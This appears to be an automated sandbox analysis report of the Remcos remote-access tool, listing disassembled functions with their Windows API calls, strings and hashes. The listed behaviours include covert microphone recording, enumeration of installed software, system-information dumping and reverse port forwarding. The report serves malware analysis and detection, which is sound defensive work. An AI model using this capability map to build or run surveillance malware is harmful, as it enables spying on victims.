                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5ceb0c3dd41d8749c3e5c53e13c3ee82ab575277eefb845cca99943617a416a4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4486635b9f067f5c856a3a66de58a1cd354bc26f8124cf63660485fb98f8bcde
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ceb0c3dd41d8749c3e5c53e13c3ee82ab575277eefb845cca99943617a416a4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC11447A550108FFCB01DF54C982CD93BA5EF08651F9D82A5F9498F622DA32EF909B81
                                                                                                                                                                                                                                                                                                                              Function 0041B834 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 214registryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B856
                                                                                                                                                                                                                                                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B89A
                                                                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0041BB64
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041B84C
                                                                                                                                                                                                                                                                                                                              • DisplayName, xrefs: 0041B8E1
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseEnumOpen
                                                                                                                                                                                                                                                                                                                              • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                                                                                              • API String ID: 1332880857-3614651759
                                                                                                                                                                                                                                                                                                                              • Opcode ID: e61d1d7cf3832e843e90d461229c70805b874dd96863d967c161257da2d9d002
                                                                                                                                                                                                                                                                                                                              • Instruction ID: efd277ba010ae8e34e1206f32af9d70b7e49420e91acd4d446967662cfc0484b
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e61d1d7cf3832e843e90d461229c70805b874dd96863d967c161257da2d9d002
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67813E311082449BD324EB21DC51AEFB7E9FFD4314F10493FB586921E1EF34AA49CA9A
                                                                                                                                                                                                                                                                                                                              Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Eventinet_ntoa
                                                                                                                                                                                                                                                                                                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                                                                                                                                                                                                                                              • API String ID: 3578746661-4192532303
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 143b51b8c07e109d26b7fe7b3a3095395f53586b6bdc06850ed722305d45c6e4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 143b51b8c07e109d26b7fe7b3a3095395f53586b6bdc06850ed722305d45c6e4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E
                                                                                                                                                                                                                                                                                                                              Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                                                                                                                                                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                                                                                                                                                                                              • API String ID: 1462127192-2001430897
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 8443322c702f13ac3e3746d381e34a707ef4bee6118d47897ecfeef81cb017d2
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8443322c702f13ac3e3746d381e34a707ef4bee6118d47897ecfeef81cb017d2
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D
                                                                                                                                                                                                                                                                                                                              Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _strftime.LIBCMT ref: 00401AD3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                                                                                                                                                              • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                                                                                                                                                                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                                                                                                                                                                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                                                                                                                                                                                              • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                                                                                                                                                                                                                                              • API String ID: 3809562944-3643129801
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 076514dc425a8215656335efed83662c63c1f2827ed6a163cb4e3b7f112a232d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 076514dc425a8215656335efed83662c63c1f2827ed6a163cb4e3b7f112a232d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A
                                                                                                                                                                                                                                                                                                                              Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                                                                                                                                                                                                                                              • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                                                                                                                                                                                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                                                                                                                                                                                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                                                                                                                                                                                                                                              • waveInStart.WINMM ref: 00401A81
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                                                                                                                                                                                              • String ID: XCG$`=G$x=G
                                                                                                                                                                                                                                                                                                                              • API String ID: 1356121797-903574159
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 2fa2782d5286cb6b946f29ce45bec9f2347d723f1f3b5a78e95a6039d4b8a833
                                                                                                                                                                                                                                                                                                                              • Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fa2782d5286cb6b946f29ce45bec9f2347d723f1f3b5a78e95a6039d4b8a833
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                                                                                                                                                                                                                                              Function 0041C97F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                                                                                                                                                                                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                                                                                                                                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                                                                                                                                                                                                                                                                                                                              • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                                                                                                                                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 0041CA0B
                                                                                                                                                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 0041CA15
                                                                                                                                                                                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                                                                                                                                                                              • String ID: Remcos
                                                                                                                                                                                                                                                                                                                              • API String ID: 1970332568-165870891
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                                                                                                                                                                                                                                              Function 0044B460 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                                                                                                                                                                                                                                                                                                                              • Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9
                                                                                                                                                                                                                                                                                                                              Function 00452B3A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E13,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BE6
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C69
                                                                                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00452CA1
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E13,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CFC
                                                                                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00452D4B
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D13
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D8F
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00452DBA
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00452DC6
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 201697637-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b1c83994ecbe3f941fd24685bb9664c395dd4006a3bd2ce5fbc620e0f8a5dfb4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1c83994ecbe3f941fd24685bb9664c395dd4006a3bd2ce5fbc620e0f8a5dfb4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8
                                                                                                                                                                                                                                                                                                                              Function 100196F5 Relevance: 13.7, APIs: 9, Instructions: 210COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$EnvironmentVariable_wcschr
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 487594629-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 03c505302b217a881feeb7d46bad7d441065908759d7a5648ba0d5e2c1f84832
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 24f0059e533d9f3fb59acd5008695e198d0c5eb1710b72595803e493e6dfdcaf
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03c505302b217a881feeb7d46bad7d441065908759d7a5648ba0d5e2c1f84832
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0616975904351ABD710DF78CC81A5EB7E4EF09760F5A426DF9419F2C1EA32E9818B90
                                                                                                                                                                                                                                                                                                                              Function 02831CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 02831D1B
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 02831D37
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02831D4B
                                                                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02831D58
                                                                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02831D72
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02831D7D
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02831D8A
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                                                                                                                                              • String ID:
